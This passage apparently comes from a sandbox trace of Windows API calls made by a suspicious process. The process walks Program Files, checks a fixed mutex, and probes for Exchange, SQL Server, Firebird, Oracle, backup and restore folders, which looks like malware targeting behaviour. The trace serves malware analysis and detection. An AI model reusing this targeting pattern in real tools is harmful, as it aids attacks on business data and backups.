nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, 
ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdde9c060, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdde9c060, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdcdcc500, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdcdcc500, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, 
ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdde75f00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdde75f00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xddf345e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddf345e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xddf345e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddf345e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0104.206] GetLastError () returned 0x12 [0104.206] FindClose (in: hFindFile=0x577e78 | out: hFindFile=0x577e78) returned 1 [0104.207] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.207] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.207] GlobalUnlock (hMem=0x45000c) returned 0 [0104.207] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.207] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.207] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.207] GlobalUnlock (hMem=0x45000c) returned 0 [0104.207] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.207] 
GlobalUnlock (hMem=0x450004) returned 0 [0104.207] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577e78 [0104.207] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f788 | out: lpLocalFileTime=0x18f788) returned 1 [0104.207] FileTimeToDosDateTime (in: lpFileTime=0x18f788, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0104.207] GlobalLock (hMem=0x450004) returned 0x588000 [0104.207] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.207] GlobalUnlock (hMem=0x450004) returned 0 [0104.207] GlobalLock (hMem=0x450004) returned 0x588000 [0104.208] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.208] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.208] GlobalUnlock (hMem=0x450004) returned 0 [0104.208] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.208] GlobalUnlock (hMem=0x45000c) returned 0 [0104.208] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.208] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.208] 
FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f784 | out: lpLocalFileTime=0x18f784) returned 1 [0104.208] FileTimeToDosDateTime (in: lpFileTime=0x18f784, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0104.208] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.208] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.208] GlobalUnlock (hMem=0x45000c) returned 0 [0104.208] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.208] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.208] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.208] GlobalUnlock (hMem=0x45000c) returned 0 [0104.208] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.208] GlobalUnlock (hMem=0x450004) returned 0 [0104.209] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.209] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0104.209] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f784 | out: lpLocalFileTime=0x18f784) returned 1 [0104.209] FileTimeToDosDateTime (in: lpFileTime=0x18f784, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0104.209] GlobalLock (hMem=0x450004) returned 0x588000 [0104.209] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.209] GlobalUnlock (hMem=0x450004) returned 0 [0104.209] GlobalLock (hMem=0x450004) returned 0x588000 [0104.209] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.209] 
GlobalHandle (pMem=0x588000) returned 0x450004 [0104.209] GlobalUnlock (hMem=0x450004) returned 0 [0104.209] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.209] GlobalUnlock (hMem=0x45000c) returned 0 [0104.209] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.209] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.209] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.209] GlobalUnlock (hMem=0x45000c) returned 0 [0104.209] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.210] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.210] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.210] GlobalUnlock (hMem=0x45000c) returned 0 [0104.210] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.210] GlobalUnlock (hMem=0x450004) returned 0 [0104.210] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.210] SysReAllocStringLen (in: pbstr=0x18f784*=0x0, psz="C:\\Program Files\\Common Files", len=0x1d | out: pbstr=0x18f784*="C:\\Program Files\\Common Files") returned 1 [0104.210] GlobalLock (hMem=0x450004) returned 0x588000 [0104.210] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.210] GlobalUnlock (hMem=0x450004) returned 0 [0104.210] GlobalLock (hMem=0x450004) returned 0x588000 [0104.210] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.210] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.210] GlobalUnlock (hMem=0x450004) returned 0 [0104.210] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.210] GlobalUnlock (hMem=0x45000c) returned 0 [0104.211] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft\\Exchange Server", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, 
ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="䱈@肄X聘X企@\x18㼔V\x18\x1b")) returned 0xffffffff [0104.211] GetLastError () returned 0x3 [0104.211] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.211] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=26, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.211] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\") returned 21 [0104.211] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft SQL Server", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@耜X企@\x18㽜V\x181")) returned 0xffffffff [0104.212] GetLastError () returned 0x2 [0104.212] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=21, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, 
cbMultiByte=9, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\") returned 9 [0104.212] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Firebird", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@脬X企@\x18㟬X\x18;")) returned 0xffffffff [0104.212] GetLastError () returned 0x2 [0104.213] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\") returned 8 [0104.213] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\MSSQL.1", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@肤X企@\x18㤄X\x18D")) returned 0xffffffff [0104.213] GetLastError () returned 0x2 [0104.215] CharLowerBuffW (in: 
lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.215] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.216] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0104.216] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@耜X企@\x18脬X\x18j")) returned 0xffffffff [0104.216] GetLastError () returned 0x2 [0104.216] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.216] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=37, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0104.216] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0104.217] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Adobe", lpFindFileData=0x18f200 | out: 
lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@紌X企@\x18㟬X\x18q")) returned 0xffffffff [0104.217] GetLastError () returned 0x2 [0104.217] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.217] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="adobe\\脨X\x80") returned 6 [0104.217] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0104.218] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Oracle", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@㊼W企@\x18㤄X\x18y")) returned 0xffffffff [0104.218] GetLastError () returned 0x2 [0104.218] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.218] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, 
lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.218] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0104.218] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Archive", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@肤X企@\x18㟬X\x18\x81")) returned 0xffffffff [0104.218] GetLastError () returned 0x2 [0104.219] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0104.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0104.219] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Backup", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, 
dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@紌X企@\x18㤄X\x18\x88")) returned 0xffffffff [0104.219] GetLastError () returned 0x2 [0104.219] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="backup㟨X\x10") returned 6 [0104.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0104.220] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Reserv", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@㊼W企@\x18㟬X\x18\x8f")) returned 0xffffffff [0104.220] GetLastError () returned 0x2 [0104.220] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="reserv㤀X\x10") returned 6 [0104.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0104.221] FindFirstFileW (in: 
lpFileName="C:\\Program Files\\Common Files\\Restore", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@肤X企@\x18㤄X\x18\x97")) returned 0xffffffff [0104.221] GetLastError () returned 0x2 [0104.221] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.221] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.221] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.221] GlobalUnlock (hMem=0x45000c) returned 0 [0104.221] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.221] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.221] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.221] GlobalUnlock (hMem=0x45000c) returned 0 [0104.222] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.222] GlobalUnlock (hMem=0x450004) returned 0 [0104.222] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.222] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa28, cbMultiByte=15, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.222] CharLowerBuffW (in: lpsz="C:\\Program 
